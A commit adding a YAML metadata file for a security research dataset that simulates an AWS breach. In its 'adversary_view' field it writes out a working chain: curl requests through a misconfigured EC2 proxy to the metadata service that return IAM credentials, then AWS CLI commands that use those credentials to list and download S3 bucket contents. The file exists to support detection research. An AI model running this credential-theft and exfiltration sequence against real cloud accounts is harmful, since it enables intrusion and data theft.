Create datasets/atomic/_metadata/SDAWS-200914011940.yaml
Browse files
datasets/atomic/_metadata/SDAWS-200914011940.yaml
ADDED
|
@@ -0,0 +1,75 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
title: AWS Cloud Bank Breach S3
|
| 2 |
+
id: SDAWS-200914011940
|
| 3 |
+
contributors:
|
| 4 |
+
- Roberto Rodriguez @Cyb3rWard0g
|
| 5 |
+
creation_date: 2020/09/13
|
| 6 |
+
modification_date: 2020/09/13
|
| 7 |
+
platform:
|
| 8 |
+
- AWS
|
| 9 |
+
type: atomic
|
| 10 |
+
tags:
|
| 11 |
+
- EC2 Proxy Abuse
|
| 12 |
+
- S3 Data Exfiltration
|
| 13 |
+
description: This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
|
| 14 |
+
attack_mappings:
|
| 15 |
+
- technique: T1078
|
| 16 |
+
sub-technique: "004"
|
| 17 |
+
tactics:
|
| 18 |
+
- TA0001
|
| 19 |
+
- TA0003
|
| 20 |
+
- TA0004
|
| 21 |
+
- TA0005
|
| 22 |
+
- technique: T1530
|
| 23 |
+
sub-technique:
|
| 24 |
+
tactics:
|
| 25 |
+
- TA0009
|
| 26 |
+
notebooks:
|
| 27 |
+
files:
|
| 28 |
+
- type: cloud
|
| 29 |
+
link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
|
| 30 |
+
simulation:
|
| 31 |
+
environment: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
|
| 32 |
+
tools:
|
| 33 |
+
- type: Cloud Formation Templates
|
| 34 |
+
name: AWS CLI
|
| 35 |
+
module: Exfiltration
|
| 36 |
+
script: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
|
| 37 |
+
permissions_required:
|
| 38 |
+
- user
|
| 39 |
+
adversary_view: |-
|
| 40 |
+
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
|
| 41 |
+
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >
|
| 42 |
+
|
| 43 |
+
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
|
| 44 |
+
{
|
| 45 |
+
"Code" : "Success",
|
| 46 |
+
"LastUpdated" : "2020-09-14T00:49:26Z",
|
| 47 |
+
"Type" : "AWS-HMAC",
|
| 48 |
+
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
|
| 49 |
+
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
|
| 50 |
+
"Token" : "TOKEN",
|
| 51 |
+
"Expiration" : "2020-09-14T07:10:27Z"
|
| 52 |
+
}
|
| 53 |
+
|
| 54 |
+
> aws configure --profile erratic
|
| 55 |
+
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
|
| 56 |
+
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
|
| 57 |
+
Default region name [None]: us-east-1
|
| 58 |
+
Default output format [None]: json
|
| 59 |
+
|
| 60 |
+
> echo aws_session_token = "TOKEN" >> ~/.aws/credentials
|
| 61 |
+
|
| 62 |
+
> aws s3 ls --profile erratic
|
| 63 |
+
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
|
| 64 |
+
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
|
| 65 |
+
|
| 66 |
+
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
|
| 67 |
+
2020-09-13 20:00:26 89 ring.txt
|
| 68 |
+
|
| 69 |
+
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
|
| 70 |
+
2020-09-13 20:00:26 89 ring.txt
|
| 71 |
+
|
| 72 |
+
> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
|
| 73 |
+
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
|
| 74 |
+
references:
|
| 75 |
+
- https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3
|